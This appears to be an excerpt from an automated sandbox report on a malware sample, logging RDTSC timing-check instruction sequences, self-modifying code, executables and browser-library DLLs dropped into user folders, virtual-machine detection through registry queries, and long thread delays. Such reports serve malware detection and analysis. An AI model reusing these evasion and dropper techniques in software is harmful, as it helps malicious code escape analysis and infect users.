                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70286 second address: 4D702F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F0EC4502020h 0x0000000b or si, AA08h 0x00000010 jmp 00007F0EC450201Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F0EC4502026h 0x0000001f mov ebp, esp 0x00000021 jmp 00007F0EC4502020h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0EC4502027h 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D702F3 second address: 4D702F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D9072B second address: 4D9073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D9073C second address: 4D90740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90740 second address: 4D90751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90751 second address: 4D9077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D9077C second address: 4D90780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90780 second address: 4D90786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90786 second address: 4D907F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov edi, 147A0E10h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007F0EC4502024h 0x00000013 mov dword ptr [esp], ecx 0x00000016 pushad 0x00000017 call 00007F0EC450201Eh 0x0000001c call 00007F0EC4502022h 0x00000021 pop eax 0x00000022 pop ebx 0x00000023 mov si, 15F7h 0x00000027 popad 0x00000028 mov eax, dword ptr [775165FCh] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0EC4502029h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D907F3 second address: 4D90820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov esi, 1649CA63h 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 je 00007F0F373BB119h 0x0000001a pushad 0x0000001b mov edi, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ch, 88h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90820 second address: 4D908C8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC450201Fh 0x00000008 sbb ax, B93Eh 0x0000000d jmp 00007F0EC4502029h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ecx, eax 0x00000018 pushad 0x00000019 mov ax, 1223h 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 popad 0x00000022 xor eax, dword ptr [ebp+08h] 0x00000025 jmp 00007F0EC4502021h 0x0000002a and ecx, 1Fh 0x0000002d pushad 0x0000002e push eax 0x0000002f mov bh, D3h 0x00000031 pop eax 0x00000032 call 00007F0EC4502025h 0x00000037 pop ecx 0x00000038 popad 0x00000039 ror eax, cl 0x0000003b pushad 0x0000003c mov ch, bh 0x0000003e pushfd 0x0000003f jmp 00007F0EC4502022h 0x00000044 add esi, 5EAE6228h 0x0000004a jmp 00007F0EC450201Bh 0x0000004f popfd 0x00000050 popad 0x00000051 leave 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push edx 0x00000056 pop ecx 0x00000057 mov cx, di 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D908C8 second address: 4D90905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F0EC4CB7FD2h 0x0000000b add cx, AFB8h 0x00000010 jmp 00007F0EC4CB7FCBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 retn 0004h 0x0000001c nop 0x0000001d mov esi, eax 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 xor esi, dword ptr [00B62014h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e push eax 0x0000002f call 00007F0EC8F287FDh 0x00000034 push FFFFFFFEh 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov edx, 33FA6BA6h 0x0000003e mov si, di 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90905 second address: 4D909B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0EC4502026h 0x00000009 or cx, 8948h 0x0000000e jmp 00007F0EC450201Bh 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop eax 0x0000001b jmp 00007F0EC450201Bh 0x00000020 ret 0x00000021 nop 0x00000022 push eax 0x00000023 call 00007F0EC8772892h 0x00000028 mov edi, edi 0x0000002a jmp 00007F0EC4502026h 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F0EC4502020h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov si, di 0x0000003a push ebx 0x0000003b pushfd 0x0000003c jmp 00007F0EC4502028h 0x00000041 adc al, 00000068h 0x00000044 jmp 00007F0EC450201Bh 0x00000049 popfd 0x0000004a pop ecx 0x0000004b popad 0x0000004c xchg eax, ebp 0x0000004d jmp 00007F0EC450201Fh 0x00000052 mov ebp, esp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D909B4 second address: 4D909B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D909B8 second address: 4D909BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D909BE second address: 4D90A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0EC4CB7FD8h 0x00000008 pushfd 0x00000009 jmp 00007F0EC4CB7FD2h 0x0000000e sub cl, 00000058h 0x00000011 jmp 00007F0EC4CB7FCBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0EC4CB7FD5h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90A16 second address: 4D90A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90A1C second address: 4D90A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4002A second address: 4D400A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502026h 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov al, 01h 0x0000000e pushfd 0x0000000f jmp 00007F0EC4502023h 0x00000014 sbb esi, 1A162CEEh 0x0000001a jmp 00007F0EC4502029h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 call 00007F0EC450201Ch 0x00000029 call 00007F0EC4502022h 0x0000002e pop ecx 0x0000002f pop edi 0x00000030 push eax 0x00000031 push edx 0x00000032 movzx eax, bx 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D400A6 second address: 4D400F3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC4CB7FD3h 0x00000008 sub al, 0000005Eh 0x0000000b jmp 00007F0EC4CB7FD9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 jmp 00007F0EC4CB7FCEh 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D400F3 second address: 4D400FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, si 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D400FB second address: 4D40101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40101 second address: 4D40105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40105 second address: 4D40171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0EC4CB7FD8h 0x00000010 xor esi, 67463DE8h 0x00000016 jmp 00007F0EC4CB7FCBh 0x0000001b popfd 0x0000001c mov ch, F1h 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007F0EC4CB7FCBh 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F0EC4CB7FD6h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0EC4CB7FCEh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40171 second address: 4D40177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40177 second address: 4D40191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40191 second address: 4D40195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40195 second address: 4D401A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D401A8 second address: 4D40207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [ebp+10h] 0x0000000d jmp 00007F0EC4502027h 0x00000012 xchg eax, esi 0x00000013 jmp 00007F0EC4502026h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0EC450201Ch 0x00000022 or ecx, 458964F8h 0x00000028 jmp 00007F0EC450201Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40207 second address: 4D40217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40217 second address: 4D4021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4021B second address: 4D40221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40221 second address: 4D40226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40226 second address: 4D4022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4022C second address: 4D40255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, bl 0x0000000f call 00007F0EC4502028h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40255 second address: 4D4029E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F0EC4CB7FD0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F0EC4CB7FCCh 0x00000018 call 00007F0EC4CB7FD2h 0x0000001d pop esi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Special instruction interceptor: First address: B6C6EE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Special instruction interceptor: First address: D45B33 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Special instruction interceptor: First address: B6EF9F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Special instruction interceptor: First address: D255CC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Special instruction interceptor: First address: DA55CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C3C6EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E15B33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C3EF9F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: DF55CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E755CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Special instruction interceptor: First address: 1028D56 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Special instruction interceptor: First address: 1028C79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Special instruction interceptor: First address: 1253685 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Special instruction interceptor: First address: 797CAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Special instruction interceptor: First address: 797DAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Special instruction interceptor: First address: 92D7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Special instruction interceptor: First address: 9C2DF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Special instruction interceptor: First address: 107A39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Special instruction interceptor: First address: 2AA69F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Special instruction interceptor: First address: 2D47A7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Special instruction interceptor: First address: 2AA289 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Special instruction interceptor: First address: 3424E5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Special instruction interceptor: First address: 9E4C3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Special instruction interceptor: First address: A148A0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Special instruction interceptor: First address: 9EDE72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Special instruction interceptor: First address: A7BBC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Special instruction interceptor: First address: 10B1B6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Special instruction interceptor: First address: EDFFA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Special instruction interceptor: First address: 35DD75 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Special instruction interceptor: First address: 503A4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Memory allocated: 1C12E190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Memory allocated: A80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Memory allocated: 24F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Memory allocated: 44F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Memory allocated: 4EA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Memory allocated: 50A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Memory allocated: 70A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Code function: 0_2_04DB0D7B rdtsc 0_2_04DB0D7B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1208
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1237
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1236
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1199
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3640
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Window / User API: threadDelayed 1254
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Window / User API: threadDelayed 2106
Source: C:\Program Files\Windows Media Player\graph\graph.exe Window / User API: threadDelayed 658
Source: C:\Program Files\Windows Media Player\graph\graph.exe Window / User API: threadDelayed 739
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exe
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3404 | Thread sleep count: 1208 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3404 | Thread sleep time: -2417208s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3044 | Thread sleep count: 1237 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3044 | Thread sleep time: -2475237s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4568 | Thread sleep time: -36000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788 | Thread sleep count: 240 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788 | Thread sleep time: -7200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3324 | Thread sleep count: 1236 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3324 | Thread sleep time: -2473236s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428 | Thread sleep count: 1199 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428 | Thread sleep time: -2399199s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 1772 | Thread sleep time: -34017s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 6256 | Thread sleep time: -32016s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 6324 | Thread sleep time: -30015s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 7104 | Thread sleep time: -270000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 5624 | Thread sleep time: -40020s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe TID: 568 | Thread sleep time: -32016s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe TID: 1788 | Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952 | Thread sleep count: 6172 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952 | Thread sleep count: 3640 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 | Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe TID: 6304 | Thread sleep time: -90000s >= -30000s
